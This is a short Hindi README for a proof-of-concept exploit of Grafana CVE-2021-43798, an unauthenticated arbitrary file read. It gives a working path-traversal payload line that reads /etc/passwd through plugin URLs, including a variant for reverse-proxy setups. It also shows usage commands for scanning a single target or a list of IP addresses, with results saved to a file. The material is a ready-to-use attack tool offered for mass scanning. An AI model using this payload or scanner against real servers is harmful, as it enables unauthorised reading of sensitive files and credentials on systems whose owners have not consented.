
grafana CVE-2021-43798 मनमाने फ़ाइल पढ़ने की कमज़ोरी का POC, जो बहु-प्लगइन पोलिंग डिटेक्शन विधि का उपयोग करता है, एकल URL निर्दिष्ट करने और फ़ाइल से URL पढ़ने की अनुमति देता है।
यदि ऑब्जेक्ट को रिवर्स प्रॉक्सी के माध्यम से संसाधित किया जाता है, तो पेलोड को इस प्रकार बदला जा सकता है
url1 = url +"/public/plugins/"+str.rstrip(plugins)+"/#/../..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd"
Grafana एक क्रॉस-प्लेटफ़ॉर्म, ओपन-सोर्स डेटा विज़ुअलाइज़ेशन वेब एप्लिकेशन प्लेटफ़ॉर्म है। उपयोगकर्ता द्वारा कनेक्टेड डेटा स्रोत कॉन्फ़िगर करने के बाद, Grafana वेब ब्राउज़र में डेटा चार्ट और अलर्ट प्रदर्शित कर सकता है।
Grafana में एक अनधिकृत मनमानी फ़ाइल रीड भेद्यता मौजूद है, जिसके माध्यम से एक अप्रमाणित हमलावर होस्ट पर किसी भी फ़ाइल को पढ़ सकता है।
CVE: CVE-2021-43798
घटक: Grafana
भेद्यता प्रकार: फ़ाइल रीड
प्रभाव: संवेदनशील जानकारी प्राप्त करना
सारांश: अनधिकृत हमलावर इस भेद्यता का उपयोग करके सर्वर की संवेदनशील फ़ाइलें प्राप्त कर सकते हैं
python3 grafana_fileread.py -u http://localhost:3000
प्राप्त डेटा को grafana 8.x_fileread_vuln.txt फ़ाइल में देखा जा सकता है
2. फ़ाइल के अंदर IP का पता लगाना
python3 grafana_fileread.py -f ip_list.txt

-h सहायता देखें
